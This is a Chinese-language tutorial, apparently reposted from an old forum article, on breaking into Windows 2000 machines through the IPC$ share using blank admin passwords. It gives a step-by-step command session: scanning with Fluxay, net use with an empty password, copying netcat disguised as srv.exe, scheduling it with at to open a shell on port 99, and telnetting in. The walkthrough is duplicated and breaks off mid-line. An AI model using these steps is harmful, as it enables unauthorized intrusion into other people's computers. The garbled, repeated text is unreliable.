IPC$入侵2
来源:百度文库 编辑:神马文学网 时间:2024/05/14 05:17:44
IPC$入侵
IPC$入侵
IPC$是Windows的默认共享。其实,这个共享并没有什么漏洞。
我们可以用主机的管理员用户名和密码连接。
问题就出在管理员密码了。直至现在为止,世界上起码有20%的人,把主机密码设置为“空”或者“123”等简单密码。
我们要寻找这些主机十分简单。只需要一个程序就可以。
下面,我会把以前写的一篇IPC$入侵文章,进行小小的修改。
本次范例需要的系统及程序情况如下:
操作系统:Windows 2000
对方操作系统:Windows 2000
程序(一):流光 IV 国际版 (Fluxay Release IV Build 2914 International Edition For NT/2000/XP)
程序(二):Srv.exe
程序(三):Ntlm.exe
本机IP:127.0.0.1
测试IP:127.0.0.25
新程序介绍:
Srv.exe:实际上是NetCat,这里改名为Srv.exe。用于在主机建立一个端口为99的shell。
Ntlm.exe:是小榕写的一个程序,用于修改Windows 2000 Telnet Servery身份验证的方式。
关于扫描的方法,在流光的help目录有一个ipc.mht的文件。里面有使用说明。
假设,我们扫描了一台IPC$主机:127.0.0.25
用户名:davis
密码:空
“//”后是注解。
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
D:>net use \127.0.0.25$ "" /user:"davis" //这是我用流光扫到的密码~~~我们就拿它开刀吧~!
命令成功完成。
D:>copy srv.exe \127.0.0.25$ //先复制srv.exe上去,在流光的Tools目录就有。
已复制 1 个文件。
D:>net time \127.0.0.25 //查查时间。
\127.0.0.25 的当前时间是 2001/1/17 上午 10:48
命令成功完成。
D:>at \\127.0.0.25 10:50 srv.exe //用at命令启动srv.exe吧~!(这里设置的时间要比主机时间快)先去论坛灌几篇帖子。
新加了一项作业,其作业 ID = 1
D:>net time \\127.0.0.25 //再查查够时间没有?!噢~~够了~
127.0.0.25 的当前时间是 2001/1/17 上午 10:51
命令成功完成。
D:>telnet 127.0.0.25 99 //我们telnet吧,注意端口是99哦~
Microsoft Windows 2000 [
IPC$入侵
IPC$是Windows的默认共享。其实,这个共享并没有什么漏洞。
我们可以用主机的管理员用户名和密码连接。
问题就出在管理员密码了。直至现在为止,世界上起码有20%的人,把主机密码设置为“空”或者“123”等简单密码。
我们要寻找这些主机十分简单。只需要一个程序就可以。
下面,我会把以前写的一篇IPC$入侵文章,进行小小的修改。
本次范例需要的系统及程序情况如下:
操作系统:Windows 2000
对方操作系统:Windows 2000
程序(一):流光 IV 国际版 (Fluxay Release IV Build 2914 International Edition For NT/2000/XP)
程序(二):Srv.exe
程序(三):Ntlm.exe
本机IP:127.0.0.1
测试IP:127.0.0.25
新程序介绍:
Srv.exe:实际上是NetCat,这里改名为Srv.exe。用于在主机建立一个端口为99的shell。
Ntlm.exe:是小榕写的一个程序,用于修改Windows 2000 Telnet Servery身份验证的方式。
关于扫描的方法,在流光的help目录有一个ipc.mht的文件。里面有使用说明。
假设,我们扫描了一台IPC$主机:127.0.0.25
用户名:davis
密码:空
“//”后是注解。
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
D:>net use \127.0.0.25$ "" /user:"davis" //这是我用流光扫到的密码~~~我们就拿它开刀吧~!
命令成功完成。
D:>copy srv.exe \127.0.0.25$ //先复制srv.exe上去,在流光的Tools目录就有。
已复制 1 个文件。
D:>net time \127.0.0.25 //查查时间。
\127.0.0.25 的当前时间是 2001/1/17 上午 10:48
命令成功完成。
D:>at \\127.0.0.25 10:50 srv.exe //用at命令启动srv.exe吧~!(这里设置的时间要比主机时间快)先去论坛灌几篇帖子。
新加了一项作业,其作业 ID = 1
D:>net time \\127.0.0.25 //再查查够时间没有?!噢~~够了~
127.0.0.25 的当前时间是 2001/1/17 上午 10:51
命令成功完成。
D:>telnet 127.0.0.25 99 //我们telnet吧,注意端口是99哦~
Microsoft Windows 2000 [